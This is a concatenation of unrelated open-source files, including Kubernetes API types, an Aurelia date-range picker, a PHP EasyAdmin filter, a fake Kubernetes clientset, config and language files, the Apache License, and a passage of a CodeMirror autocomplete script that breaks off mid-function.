	// cells will be as wide as headers and may contain strings, numbers (float64 or int64), booleans, simple
	// maps, or lists, or null. See the type field of the column definition for a more detailed description.
	// Cells align positionally with the Table's columnDefinitions.
	Cells []interface{} `json:"cells"`
	// conditions describe additional status of a row that are relevant for a human user.
	// +optional
	Conditions []TableRowCondition `json:"conditions,omitempty"`
	// This field contains the requested additional information about each object based on the includeObject
	// policy when requesting the Table. If "None", this field is empty, if "Object" this will be the
	// default serialization of the object for the current API version, and if "Metadata" (the default) will
	// contain the object metadata. Check the returned kind and apiVersion of the object before parsing.
	// +optional
	Object runtime.RawExtension `json:"object,omitempty"`
}
// TableRowCondition allows a row to be marked with additional information.
// +protobuf=false
type TableRowCondition struct {
	// Type of row condition. The set of types is open-ended; only RowCompleted
	// is defined in this package.
	Type RowConditionType `json:"type"`
	// Status of the condition, one of True, False, Unknown.
	Status ConditionStatus `json:"status"`
	// (brief) machine readable reason for the condition's last transition.
	// +optional
	Reason string `json:"reason,omitempty"`
	// Human readable message indicating details about last transition.
	// +optional
	Message string `json:"message,omitempty"`
}
// RowConditionType identifies the kind of a TableRowCondition.
type RowConditionType string

// These are valid conditions of a row. This list is not exhaustive and new conditions may be
// included by other resources.
const (
	// RowCompleted means the underlying resource has reached completion and may be given less
	// visual priority than other resources.
	RowCompleted RowConditionType = "Completed"
)
// ConditionStatus expresses whether a resource is in a condition.
type ConditionStatus string

// These are valid condition statuses. "ConditionTrue" means a resource is in the condition.
// "ConditionFalse" means a resource is not in the condition. "ConditionUnknown" means kubernetes
// can't decide if a resource is in the condition or not. In the future, we could add other
// intermediate conditions, e.g. ConditionDegraded.
const (
	ConditionTrue    ConditionStatus = "True"
	ConditionFalse   ConditionStatus = "False"
	ConditionUnknown ConditionStatus = "Unknown"
)
// IncludeObjectPolicy controls which portion of the object is returned with a Table.
// Valid values are defined by the constants below.
type IncludeObjectPolicy string

const (
	// IncludeNone returns no object.
	IncludeNone IncludeObjectPolicy = "None"
	// IncludeMetadata serializes the object containing only its metadata field.
	IncludeMetadata IncludeObjectPolicy = "Metadata"
	// IncludeObject contains the full object.
	IncludeObject IncludeObjectPolicy = "Object"
)
// TableOptions are used when a Table is requested by the caller.
// +k8s:deepcopy-gen:interfaces=k8s.io/apimachinery/pkg/runtime.Object
type TableOptions struct {
	v1.TypeMeta `json:",inline"`
	// includeObject decides whether to include each object along with its columnar information.
	// Specifying "None" will return no object, specifying "Object" will return the full object contents, and
	// specifying "Metadata" (the default) will return the object's metadata in the PartialObjectMetadata kind
	// in version v1beta1 of the meta.k8s.io API group.
	IncludeObject IncludeObjectPolicy `json:"includeObject,omitempty" protobuf:"bytes,1,opt,name=includeObject,casttype=IncludeObjectPolicy"`
}
// PartialObjectMetadata is a generic representation of any object with ObjectMeta. It allows clients
// to get access to a particular ObjectMeta schema without knowing the details of the version.
// +k8s:deepcopy-gen:interfaces=k8s.io/apimachinery/pkg/runtime.Object
type PartialObjectMetadata struct {
	v1.TypeMeta `json:",inline"`
	// Standard object's metadata.
	// More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#metadata
	// +optional
	v1.ObjectMeta `json:"metadata,omitempty" protobuf:"bytes,1,opt,name=metadata"`
}
// PartialObjectMetadataList contains a list of objects containing only their metadata
// +k8s:deepcopy-gen:interfaces=k8s.io/apimachinery/pkg/runtime.Object
type PartialObjectMetadataList struct {
	v1.TypeMeta `json:",inline"`
	// items contains each of the included items. Note the elements are
	// pointers, unlike most list types in this API group.
	Items []*PartialObjectMetadata `json:"items" protobuf:"bytes,1,rep,name=items"`
}
|
{
"pile_set_name": "Github"
}
|
// Generated by CoffeeScript 1.9.3
var Padding, PaddingBottom, PaddingLeft, PaddingRight, PaddingTop, _Declaration,
extend = function(child, parent) { for (var key in parent) { if (hasProp.call(parent, key)) child[key] = parent[key]; } function ctor() { this.constructor = child; } ctor.prototype = parent.prototype; child.prototype = new ctor(); child.__super__ = parent.prototype; return child; },
hasProp = {}.hasOwnProperty;
_Declaration = require('./_Declaration');
PaddingTop = require('./PaddingTop');
PaddingLeft = require('./PaddingLeft');
PaddingRight = require('./PaddingRight');
PaddingBottom = require('./PaddingBottom');
module.exports = Padding = (function(superClass) {
var self;
extend(Padding, superClass);
function Padding() {
return Padding.__super__.constructor.apply(this, arguments);
}
self = Padding;
Padding.setOnto = function(declarations, prop, originalValue) {
var append, val, vals;
append = '';
val = _Declaration.sanitizeValue(originalValue);
if (_Declaration.importantClauseRx.test(String(val))) {
append = ' !important';
val = val.replace(_Declaration.importantClauseRx, '');
}
val = val.trim();
if (val.length === 0) {
return self._setAllDirections(declarations, append, append, append, append);
}
vals = val.split(" ").map(function(val) {
return val + append;
});
if (vals.length === 1) {
return self._setAllDirections(declarations, vals[0], vals[0], vals[0], vals[0]);
} else if (vals.length === 2) {
return self._setAllDirections(declarations, vals[0], vals[1], vals[0], vals[1]);
} else if (vals.length === 3) {
return self._setAllDirections(declarations, vals[0], vals[1], vals[2], vals[1]);
} else if (vals.length === 4) {
return self._setAllDirections(declarations, vals[0], vals[1], vals[2], vals[3]);
} else {
throw Error("Can't understand value for padding: `" + originalValue + "`");
}
};
Padding._setAllDirections = function(declarations, top, right, bottom, left) {
PaddingTop.setOnto(declarations, 'paddingTop', top);
PaddingTop.setOnto(declarations, 'paddingRight', right);
PaddingTop.setOnto(declarations, 'paddingBottom', bottom);
PaddingTop.setOnto(declarations, 'paddingLeft', left);
};
return Padding;
})(_Declaration);
|
{
"pile_set_name": "Github"
}
|
/*
* Copyright (C) 2017-2018 Team Kodi
* This file is part of Kodi - https://kodi.tv
*
* SPDX-License-Identifier: GPL-2.0-or-later
* See LICENSES/README.md for more information.
*/
#pragma once
#include "cores/RetroPlayer/process/RPProcessInfo.h"
namespace KODI
{
namespace RETRO
{
// RetroPlayer process-info specialization for the X11 windowing system.
class CRPProcessInfoX11 : public CRPProcessInfo
{
public:
  CRPProcessInfoX11();

  // Factory method returning a new instance as the base-class pointer.
  static CRPProcessInfo* Create();

  // NOTE(review): presumably registers the Create() factory with the
  // RetroPlayer process-info machinery — confirm in the .cpp.
  static void Register();
};
} // namespace RETRO
} // namespace KODI
|
{
"pile_set_name": "Github"
}
|
/**
* @author : Adarsh Pastakia
* @version : 5.0.0
* @copyright : 2019
* @license : MIT
*/
import { bindable, bindingMode, computedFrom, customElement, inlineView, viewResources } from "aurelia-framework";
import { addMonths, endOfDay, isAfter, isBefore, isSameMonth, startOfDay, startOfMonth } from "date-fns";
import { UIFormat } from "../utils/ui-format";
import { CalendarHead } from "./calendar-head";
import {
buildHeaderConfig,
CALENDAR_VIEWS,
changeMonth,
getTitle,
IDatePreset,
IHeaderConfig,
parseDate,
parseRange
} from "./calendar-utils";
import { DaysPage } from "./days-page";
import { MonthsPage } from "./months-page";
import { TimePage } from "./time-page";
import view from "./ui-range-picker.html";
import { YearsPage } from "./years-page";
/**
 * <ui-range-picker> — a dual-calendar control for selecting a date range.
 *
 * The left ("start") and right ("end") calendars navigate independently
 * between day/month/year pages; picking two day cells produces an ISO-string
 * tuple bound through the two-way `date` property.
 */
@customElement("ui-range-picker")
@inlineView(view)
@viewResources(CalendarHead, DaysPage, MonthsPage, YearsPage, TimePage)
export class UIRangePicker {
  // Current value: an [startISO, endISO] tuple, a preset key string, or undefined.
  @bindable({ defaultBindingMode: bindingMode.twoWay })
  public date: [string, string] | string | undefined;

  // Lower/upper bounds for selectable dates (parsed via parseDate).
  @bindable()
  public minDate: string | undefined;
  @bindable()
  public maxDate: string | undefined;

  // date-fns format string used when building the human-readable label.
  @bindable()
  public format: string = "dd MMM yyyy";

  // Named shortcut ranges; when `date` equals a preset key its label is used.
  @bindable()
  public datePresets: IDatePreset[] = [];

  // Formatted "start ~ end" (or preset) label, pushed out to the binding.
  @bindable({ defaultBindingMode: bindingMode.fromView })
  public dateLabel: string;

  // First-of-month anchors for the two visible calendars.
  protected startMonth = startOfMonth(new Date());
  protected endMonth = startOfMonth(addMonths(new Date(), 1));

  // Current page (days/months/years) shown by each calendar.
  protected startPage = CALENDAR_VIEWS.DAYS;
  protected endPage = CALENDAR_VIEWS.DAYS;
  protected VIEWS = CALENDAR_VIEWS;

  // Date currently hovered while a selection is in progress ("hilight" sic —
  // the name is referenced by the inline view, so it cannot be renamed here).
  protected hilight: Date;
  // Anchor date of an in-progress selection; falsy when no selection is open.
  protected selecting: Date;

  // Parsed [start, end] Date pair mirroring `date`.
  private selectedDate: [Date, Date];

  // Aurelia lifecycle hook: normalize the initial `date` value.
  protected bind() {
    this.dateChanged();
  }

  // Re-parse `date`, sync the visible months to it and recompute the label.
  protected dateChanged() {
    this.selectedDate = parseRange(this.date);
    if (this.selectedDate) {
      this.startMonth = startOfMonth(this.selectedDate[0]);
      this.endMonth = startOfMonth(this.selectedDate[1]);
      const preset = this.datePresets.find(p => p.preset === this.date);
      this.dateLabel = preset
        ? preset.label
        : `${UIFormat.date(this.selectedDate[0], this.format)} ~ ${UIFormat.date(
            this.selectedDate[1],
            this.format
          )}`;
    }
  }

  // Config shared by the child pages; while a selection is in progress the
  // displayed range is [anchor, hovered] instead of the committed selection.
  @computedFrom("selectedDate", "hilight", "selecting", "minDate", "maxDate", "disabledDates")
  get config() {
    return {
      date: this.selecting ? ([this.selecting, this.hilight] as [Date, Date]) : this.selectedDate,
      minDate: parseDate(this.minDate),
      maxDate: parseDate(this.maxDate),
      disabled: []
    };
  }

  // Header title for the start calendar (depends on its month and page).
  @computedFrom("startMonth", "startPage")
  get startTitle(): string {
    return getTitle(this.startMonth, this.startPage);
  }

  // Header title for the end calendar.
  @computedFrom("endMonth", "endPage")
  get endTitle(): string {
    return getTitle(this.endMonth, this.endPage);
  }

  @computedFrom("startMonth", "startPage", "minDate", "maxDate")
  get startHeaderOptions(): IHeaderConfig {
    return buildHeaderConfig(this.startMonth, this.startPage, {
      ...this.config,
      page: this.startPage
    });
  }

  @computedFrom("endMonth", "endPage", "minDate", "maxDate")
  get endHeaderOptions(): IHeaderConfig {
    return buildHeaderConfig(this.endMonth, this.endPage, { ...this.config, page: this.endPage });
  }

  // Header click on the start calendar. The title cycles to a coarser page
  // (assumes CALENDAR_VIEWS values are consecutive ints with DAYS < YEARS —
  // consistent with the ++/-- navigation; TODO confirm in calendar-utils).
  // The arrow tools page the month, keeping endMonth after startMonth.
  protected startHeaderClicked($event: MouseEvent) {
    const target = $event.target as HTMLElement;
    if (target.dataset.tool) {
      if (target.dataset.tool === CalendarHead.TITLE) {
        if (this.startPage !== CALENDAR_VIEWS.YEARS) {
          this.startPage++;
        }
      } else {
        this.startMonth = changeMonth(this.startMonth, this.startPage, target.dataset.tool);
        if (
          isSameMonth(this.startMonth, this.endMonth) ||
          isAfter(this.startMonth, this.endMonth)
        ) {
          this.endMonth = addMonths(this.startMonth, 1);
        }
      }
    }
  }

  // Header click on the end calendar; mirror of startHeaderClicked, keeping
  // startMonth before endMonth.
  protected endHeaderClicked($event: MouseEvent) {
    const target = $event.target as HTMLElement;
    if (target.dataset.tool) {
      if (target.dataset.tool === CalendarHead.TITLE) {
        if (this.endPage !== CALENDAR_VIEWS.YEARS) {
          this.endPage++;
        }
      } else {
        this.endMonth = changeMonth(this.endMonth, this.endPage, target.dataset.tool);
        if (
          isSameMonth(this.startMonth, this.endMonth) ||
          isBefore(this.endMonth, this.startMonth)
        ) {
          this.startMonth = addMonths(this.endMonth, -1);
        }
      }
    }
  }

  // Day-cell click: first click stores the anchor; second click commits the
  // ordered [start-of-day, end-of-day] pair as ISO strings into `date`.
  protected selectDate($event: MouseEvent) {
    const target = $event.target as HTMLElement;
    if (target.dataset.date) {
      const date = new Date(target.dataset.date);
      if (this.selecting) {
        this.date = isBefore(date, this.selecting)
          ? [startOfDay(date).toISOString(), endOfDay(this.selecting).toISOString()]
          : [startOfDay(this.selecting).toISOString(), endOfDay(date).toISOString()];
        this.selecting = null;
      } else {
        this.selecting = date;
      }
    }
  }

  // Month/year-cell click on the start calendar: drill down one page and keep
  // the end calendar after the start calendar.
  protected selectStartMonth($event: MouseEvent) {
    const target = $event.target as HTMLElement;
    if (target.dataset.date) {
      this.startMonth = new Date(target.dataset.date);
      this.startPage--;
      if (isSameMonth(this.startMonth, this.endMonth) || isAfter(this.startMonth, this.endMonth)) {
        this.endMonth = addMonths(this.startMonth, 1);
      }
    }
  }

  // Month/year-cell click on the end calendar; mirror of selectStartMonth.
  protected selectEndMonth($event: MouseEvent) {
    const target = $event.target as HTMLElement;
    if (target.dataset.date) {
      this.endMonth = new Date(target.dataset.date);
      this.endPage--;
      if (isSameMonth(this.startMonth, this.endMonth) || isBefore(this.endMonth, this.startMonth)) {
        this.startMonth = addMonths(this.endMonth, -1);
      }
    }
  }

  // Abort any in-progress selection and reset both calendars to day view.
  protected cancelSelection() {
    this.selecting = null;
    this.startPage = CALENDAR_VIEWS.DAYS;
    this.endPage = CALENDAR_VIEWS.DAYS;
  }

  // Mouse-over handler: track the hovered day for range preview.
  protected hilightDate($event: MouseEvent) {
    const target = $event.target as HTMLElement;
    if (target.dataset.date) {
      this.hilight = new Date(target.dataset.date);
    }
  }

  // Apply a named preset; dateChanged() resolves it to a label and range.
  protected selectPreset(preset) {
    this.cancelSelection();
    this.date = preset;
  }
}
|
{
"pile_set_name": "Github"
}
|
<?php
namespace EasyCorp\Bundle\EasyAdminBundle\Filter;
use Doctrine\ORM\QueryBuilder;
use EasyCorp\Bundle\EasyAdminBundle\Contracts\Filter\FilterInterface;
use EasyCorp\Bundle\EasyAdminBundle\Dto\EntityDto;
use EasyCorp\Bundle\EasyAdminBundle\Dto\FieldDto;
use EasyCorp\Bundle\EasyAdminBundle\Dto\FilterDataDto;
use EasyCorp\Bundle\EasyAdminBundle\Form\Filter\Type\NumericFilterType;
use EasyCorp\Bundle\EasyAdminBundle\Form\Type\ComparisonType;
/**
* @author Yonel Ceruto <yonelceruto@gmail.com>
* @author Javier Eguiluz <javier.eguiluz@gmail.com>
*/
final class NumericFilter implements FilterInterface
{
    use FilterTrait;

    /**
     * Creates the filter for the given numeric property.
     */
    public static function new(string $propertyName, $label = null): self
    {
        $filter = new self();

        return $filter
            ->setFilterFqcn(__CLASS__)
            ->setProperty($propertyName)
            ->setLabel($label)
            ->setFormType(NumericFilterType::class)
            ->setFormTypeOption('translation_domain', 'EasyAdminBundle');
    }

    /**
     * Adds the numeric comparison (single operator or BETWEEN range)
     * as an AND condition on the query builder.
     */
    public function apply(QueryBuilder $queryBuilder, FilterDataDto $filterDataDto, ?FieldDto $fieldDto, EntityDto $entityDto): void
    {
        $entityAlias = $filterDataDto->getEntityAlias();
        $propertyName = $filterDataDto->getProperty();
        $comparisonOperator = $filterDataDto->getComparison();
        $firstParameter = $filterDataDto->getParameterName();
        $secondParameter = $filterDataDto->getParameter2Name();
        $firstValue = $filterDataDto->getValue();
        $secondValue = $filterDataDto->getValue2();

        if (ComparisonType::BETWEEN !== $comparisonOperator) {
            // Single-operand comparison.
            $queryBuilder
                ->andWhere(sprintf('%s.%s %s :%s', $entityAlias, $propertyName, $comparisonOperator, $firstParameter))
                ->setParameter($firstParameter, $firstValue);

            return;
        }

        // Range comparison: bind both boundary parameters.
        $queryBuilder
            ->andWhere(sprintf('%s.%s BETWEEN :%s and :%s', $entityAlias, $propertyName, $firstParameter, $secondParameter))
            ->setParameter($firstParameter, $firstValue)
            ->setParameter($secondParameter, $secondValue);
    }
}
|
{
"pile_set_name": "Github"
}
|
// Code generated by client-gen. DO NOT EDIT.
package fake
import (
clientset "github.com/aquasecurity/starboard/pkg/generated/clientset/versioned"
aquasecurityv1alpha1 "github.com/aquasecurity/starboard/pkg/generated/clientset/versioned/typed/aquasecurity/v1alpha1"
fakeaquasecurityv1alpha1 "github.com/aquasecurity/starboard/pkg/generated/clientset/versioned/typed/aquasecurity/v1alpha1/fake"
"k8s.io/apimachinery/pkg/runtime"
"k8s.io/apimachinery/pkg/watch"
"k8s.io/client-go/discovery"
fakediscovery "k8s.io/client-go/discovery/fake"
"k8s.io/client-go/testing"
)
// NewSimpleClientset returns a clientset that will respond with the provided objects.
// It's backed by a very simple object tracker that processes creates, updates and deletions as-is,
// without applying any validations and/or defaults. It shouldn't be considered a replacement
// for a real clientset and is mostly useful in simple unit tests.
func NewSimpleClientset(objects ...runtime.Object) *Clientset {
	// `scheme` and `codecs` are package-level values defined elsewhere in this
	// generated package.
	o := testing.NewObjectTracker(scheme, codecs.UniversalDecoder())
	for _, obj := range objects {
		if err := o.Add(obj); err != nil {
			panic(err)
		}
	}

	cs := &Clientset{tracker: o}
	cs.discovery = &fakediscovery.FakeDiscovery{Fake: &cs.Fake}
	// Route every verb on every resource through the tracker.
	cs.AddReactor("*", "*", testing.ObjectReaction(o))
	cs.AddWatchReactor("*", func(action testing.Action) (handled bool, ret watch.Interface, err error) {
		gvr := action.GetResource()
		ns := action.GetNamespace()
		// NOTE: this local `watch` shadows the imported watch package for the
		// remainder of the closure (generated code; harmless here).
		watch, err := o.Watch(gvr, ns)
		if err != nil {
			return false, nil, err
		}
		return true, watch, nil
	})

	return cs
}
// Clientset implements clientset.Interface. Meant to be embedded into a
// struct to get a default implementation. This makes faking out just the method
// you want to test easier.
type Clientset struct {
	testing.Fake
	// discovery serves fake discovery data, wired to the embedded Fake.
	discovery *fakediscovery.FakeDiscovery
	// tracker stores the objects this fake clientset serves.
	tracker testing.ObjectTracker
}
// Discovery returns the fake DiscoveryInterface that shares this clientset's
// action recorder.
func (c *Clientset) Discovery() discovery.DiscoveryInterface {
	return c.discovery
}
// Tracker returns the ObjectTracker backing this clientset, allowing tests to
// seed or inspect tracked objects directly.
func (c *Clientset) Tracker() testing.ObjectTracker {
	return c.tracker
}

// Compile-time assertion that Clientset satisfies clientset.Interface.
var _ clientset.Interface = &Clientset{}
// AquasecurityV1alpha1 retrieves the AquasecurityV1alpha1Client
func (c *Clientset) AquasecurityV1alpha1() aquasecurityv1alpha1.AquasecurityV1alpha1Interface {
	// The fake typed client records actions on this clientset's shared Fake.
	return &fakeaquasecurityv1alpha1.FakeAquasecurityV1alpha1{Fake: &c.Fake}
}
|
{
"pile_set_name": "Github"
}
|
<FindBugsFilter>
<Match>
<Or>
<Class name="~.*\.R\$.*" />
<Class name="~.*Test" />
<Class name="~.*Test\$.*" />
<Class name="~.*\.Manifest\$.*" />
</Or>
</Match>
</FindBugsFilter>
|
{
"pile_set_name": "Github"
}
|
; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8
PLG_FIELDS_CALENDAR="Fields - Calendar"
PLG_FIELDS_CALENDAR_DEFAULT_VALUE_LABEL="Default Date"
PLG_FIELDS_CALENDAR_DEFAULT_VALUE_DESC="This is the default date. The value can be an ISO 8601 format (YYYY-MM-DD HH:MM:SS) or NOW, which displays the actual date."
PLG_FIELDS_CALENDAR_LABEL="Calendar (%s)"
PLG_FIELDS_CALENDAR_PARAMS_SHOWTIME_DESC="If enabled, the calendar field expects a date and time and will also display the time. The formats are localised using the regular language strings."
PLG_FIELDS_CALENDAR_PARAMS_SHOWTIME_LABEL="Show Time"
PLG_FIELDS_CALENDAR_XML_DESCRIPTION="This plugin lets you create new fields of type 'calendar' in any extensions where custom fields are supported."
|
{
"pile_set_name": "Github"
}
|
Apache License
Version 2.0, January 2004
http://www.apache.org/licenses/
TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
1. Definitions.
"License" shall mean the terms and conditions for use, reproduction,
and distribution as defined by Sections 1 through 9 of this document.
"Licensor" shall mean the copyright owner or entity authorized by
the copyright owner that is granting the License.
"Legal Entity" shall mean the union of the acting entity and all
other entities that control, are controlled by, or are under common
control with that entity. For the purposes of this definition,
"control" means (i) the power, direct or indirect, to cause the
direction or management of such entity, whether by contract or
otherwise, or (ii) ownership of fifty percent (50%) or more of the
outstanding shares, or (iii) beneficial ownership of such entity.
"You" (or "Your") shall mean an individual or Legal Entity
exercising permissions granted by this License.
"Source" form shall mean the preferred form for making modifications,
including but not limited to software source code, documentation
source, and configuration files.
"Object" form shall mean any form resulting from mechanical
transformation or translation of a Source form, including but
not limited to compiled object code, generated documentation,
and conversions to other media types.
"Work" shall mean the work of authorship, whether in Source or
Object form, made available under the License, as indicated by a
copyright notice that is included in or attached to the work
(an example is provided in the Appendix below).
"Derivative Works" shall mean any work, whether in Source or Object
form, that is based on (or derived from) the Work and for which the
editorial revisions, annotations, elaborations, or other modifications
represent, as a whole, an original work of authorship. For the purposes
of this License, Derivative Works shall not include works that remain
separable from, or merely link (or bind by name) to the interfaces of,
the Work and Derivative Works thereof.
"Contribution" shall mean any work of authorship, including
the original version of the Work and any modifications or additions
to that Work or Derivative Works thereof, that is intentionally
submitted to Licensor for inclusion in the Work by the copyright owner
or by an individual or Legal Entity authorized to submit on behalf of
the copyright owner. For the purposes of this definition, "submitted"
means any form of electronic, verbal, or written communication sent
to the Licensor or its representatives, including but not limited to
communication on electronic mailing lists, source code control systems,
and issue tracking systems that are managed by, or on behalf of, the
Licensor for the purpose of discussing and improving the Work, but
excluding communication that is conspicuously marked or otherwise
designated in writing by the copyright owner as "Not a Contribution."
"Contributor" shall mean Licensor and any individual or Legal Entity
on behalf of whom a Contribution has been received by Licensor and
subsequently incorporated within the Work.
2. Grant of Copyright License. Subject to the terms and conditions of
this License, each Contributor hereby grants to You a perpetual,
worldwide, non-exclusive, no-charge, royalty-free, irrevocable
copyright license to reproduce, prepare Derivative Works of,
publicly display, publicly perform, sublicense, and distribute the
Work and such Derivative Works in Source or Object form.
3. Grant of Patent License. Subject to the terms and conditions of
this License, each Contributor hereby grants to You a perpetual,
worldwide, non-exclusive, no-charge, royalty-free, irrevocable
(except as stated in this section) patent license to make, have made,
use, offer to sell, sell, import, and otherwise transfer the Work,
where such license applies only to those patent claims licensable
by such Contributor that are necessarily infringed by their
Contribution(s) alone or by combination of their Contribution(s)
with the Work to which such Contribution(s) was submitted. If You
institute patent litigation against any entity (including a
cross-claim or counterclaim in a lawsuit) alleging that the Work
or a Contribution incorporated within the Work constitutes direct
or contributory patent infringement, then any patent licenses
granted to You under this License for that Work shall terminate
as of the date such litigation is filed.
4. Redistribution. You may reproduce and distribute copies of the
Work or Derivative Works thereof in any medium, with or without
modifications, and in Source or Object form, provided that You
meet the following conditions:
(a) You must give any other recipients of the Work or
Derivative Works a copy of this License; and
(b) You must cause any modified files to carry prominent notices
stating that You changed the files; and
(c) You must retain, in the Source form of any Derivative Works
that You distribute, all copyright, patent, trademark, and
attribution notices from the Source form of the Work,
excluding those notices that do not pertain to any part of
the Derivative Works; and
(d) If the Work includes a "NOTICE" text file as part of its
distribution, then any Derivative Works that You distribute must
include a readable copy of the attribution notices contained
within such NOTICE file, excluding those notices that do not
pertain to any part of the Derivative Works, in at least one
of the following places: within a NOTICE text file distributed
as part of the Derivative Works; within the Source form or
documentation, if provided along with the Derivative Works; or,
within a display generated by the Derivative Works, if and
wherever such third-party notices normally appear. The contents
of the NOTICE file are for informational purposes only and
do not modify the License. You may add Your own attribution
notices within Derivative Works that You distribute, alongside
or as an addendum to the NOTICE text from the Work, provided
that such additional attribution notices cannot be construed
as modifying the License.
You may add Your own copyright statement to Your modifications and
may provide additional or different license terms and conditions
for use, reproduction, or distribution of Your modifications, or
for any such Derivative Works as a whole, provided Your use,
reproduction, and distribution of the Work otherwise complies with
the conditions stated in this License.
5. Submission of Contributions. Unless You explicitly state otherwise,
any Contribution intentionally submitted for inclusion in the Work
by You to the Licensor shall be under the terms and conditions of
this License, without any additional terms or conditions.
Notwithstanding the above, nothing herein shall supersede or modify
the terms of any separate license agreement you may have executed
with Licensor regarding such Contributions.
6. Trademarks. This License does not grant permission to use the trade
names, trademarks, service marks, or product names of the Licensor,
except as required for reasonable and customary use in describing the
origin of the Work and reproducing the content of the NOTICE file.
7. Disclaimer of Warranty. Unless required by applicable law or
agreed to in writing, Licensor provides the Work (and each
Contributor provides its Contributions) on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
implied, including, without limitation, any warranties or conditions
of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
PARTICULAR PURPOSE. You are solely responsible for determining the
appropriateness of using or redistributing the Work and assume any
risks associated with Your exercise of permissions under this License.
8. Limitation of Liability. In no event and under no legal theory,
whether in tort (including negligence), contract, or otherwise,
unless required by applicable law (such as deliberate and grossly
negligent acts) or agreed to in writing, shall any Contributor be
liable to You for damages, including any direct, indirect, special,
incidental, or consequential damages of any character arising as a
result of this License or out of the use or inability to use the
Work (including but not limited to damages for loss of goodwill,
work stoppage, computer failure or malfunction, or any and all
other commercial damages or losses), even if such Contributor
has been advised of the possibility of such damages.
9. Accepting Warranty or Additional Liability. While redistributing
the Work or Derivative Works thereof, You may choose to offer,
and charge a fee for, acceptance of support, warranty, indemnity,
or other liability obligations and/or rights consistent with this
License. However, in accepting such obligations, You may act only
on Your own behalf and on Your sole responsibility, not on behalf
of any other Contributor, and only if You agree to indemnify,
defend, and hold each Contributor harmless for any liability
incurred by, or claims asserted against, such Contributor by reason
of your accepting any such warranty or additional liability.
END OF TERMS AND CONDITIONS
APPENDIX: How to apply the Apache License to your work.
To apply the Apache License to your work, attach the following
boilerplate notice, with the fields enclosed by brackets "[]"
replaced with your own identifying information. (Don't include
the brackets!) The text should be enclosed in the appropriate
comment syntax for the file format. We also recommend that a
file or class name and description of purpose be included on the
same "printed page" as the copyright notice for easier
identification within third-party archives.
Copyright [yyyy] [name of copyright owner]
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
|
{
"pile_set_name": "Github"
}
|
{
"status_code": 200,
"data": {
"FailedEntries": [],
"ResponseMetadata": {
"HTTPStatusCode": 200,
"RequestId": "66f128aa-6a74-11e6-b1df-6905c3c8daa6",
"HTTPHeaders": {
"x-amzn-requestid": "66f128aa-6a74-11e6-b1df-6905c3c8daa6",
"date": "Thu, 25 Aug 2016 03:31:25 GMT",
"content-length": "41",
"content-type": "application/x-amz-json-1.1"
}
},
"FailedEntryCount": 0
}
}
|
{
"pile_set_name": "Github"
}
|
(function () {
function forEach(arr, f) {
for (var i = 0, e = arr.length; i < e; ++i) f(arr[i]);
}
function arrayContains(arr, item) {
if (!Array.prototype.indexOf) {
var i = arr.length;
while (i--) {
if (arr[i] === item) {
return true;
}
}
return false;
}
return arr.indexOf(item) != -1;
}
function scriptHint(editor, keywords, getToken) {
// Find the token at the cursor
var cur = editor.getCursor(), token = getToken(editor, cur), tprop = token;
// If it's not a 'word-style' token, ignore the token.
if (!/^[\w$_]*$/.test(token.string)) {
token = tprop = {start: cur.ch, end: cur.ch, string: "", state: token.state,
className: token.string == "." ? "property" : null};
}
// If it is a property, find out what it is a property of.
while (tprop.className == "property") {
tprop = getToken(editor, {line: cur.line, ch: tprop.start});
if (tprop.string != ".") return;
tprop = getToken(editor, {line: cur.line, ch: tprop.start});
if (tprop.string == ')') {
var level = 1;
do {
tprop = getToken(editor, {line: cur.line, ch: tprop.start});
switch (tprop.string) {
case ')': level++; break;
case '(': level--; break;
default: break;
}
} while (level > 0)
tprop = getToken(editor, {line: cur.line, ch: tprop.start});
if (tprop.className == 'variable')
tprop.className = 'function';
else return; // no clue
}
if (!context) var context = [];
context.push(tprop);
}
return {list: getCompletions(token, context, keywords),
from: {line: cur.line, ch: token.start},
to: {line: cur.line, ch: token.end}};
}
CodeMirror.javascriptHint = function(editor) {
return scriptHint(editor, javascriptKeywords,
function (e, cur) {return e.getTokenAt(cur);});
}
function getCoffeeScriptToken(editor, cur) {
// This getToken, it is for coffeescript, imitates the behavior of
// getTokenAt method in javascript.js, that is, returning "property"
// type and treat "." as indepenent token.
var token = editor.getTokenAt(cur);
if (cur.ch == token.start + 1 && token.string.charAt(0) == '.') {
token.end = token.start;
token.string = '.';
token.className = "property";
}
else if (/^\.[\w$_]*$/.test(token.string)) {
token.className = "property";
token.start++;
token.string = token.string.replace(/\./, '');
}
return token;
}
CodeMirror.coffeescriptHint = function(editor) {
return scriptHint(editor, coffeescriptKeywords, getCoffeeScriptToken);
}
var stringProps = ("charAt charCodeAt indexOf lastIndexOf substring substr slice trim trimLeft trimRight " +
"toUpperCase toLowerCase split concat match replace search").split(" ");
var arrayProps = ("length concat join splice push pop shift unshift slice reverse sort indexOf " +
"lastIndexOf every some filter forEach map reduce reduceRight ").split(" ");
var funcProps = "prototype apply call bind".split(" ");
var javascriptKeywords = ("break case catch continue debugger default delete do else false finally for function " +
"if in instanceof new null return switch throw true try typeof var void while with").split(" ");
var coffeescriptKeywords = ("and break catch class continue delete do else extends false finally for " +
"if in instanceof isnt new no not null of off on or return switch then throw true try typeof until void while with yes").split(" ");
function getCompletions(token, context, keywords) {
var found = [], start = token.string;
function maybeAdd(str) {
if (str.indexOf(start) == 0 && !arrayContains(found, str)) found.push(str);
}
function gatherCompletions(obj) {
if (typeof obj == "string") forEach(stringProps, maybeAdd);
else if (obj instanceof Array) forEach(arrayProps, maybeAdd);
else if (obj instanceof Function) forEach(funcProps, maybeAdd);
for (var name in obj) maybeAdd(name);
}
if (context) {
// If this is a property, see if it belongs to some object we can
// find in the current environment.
var obj = context.pop(), base;
if (obj.className == "variable")
base = window[obj.string];
else if (obj.className == "string")
base = "";
else if (obj.className == "atom")
base = 1;
else if (obj.className == "function") {
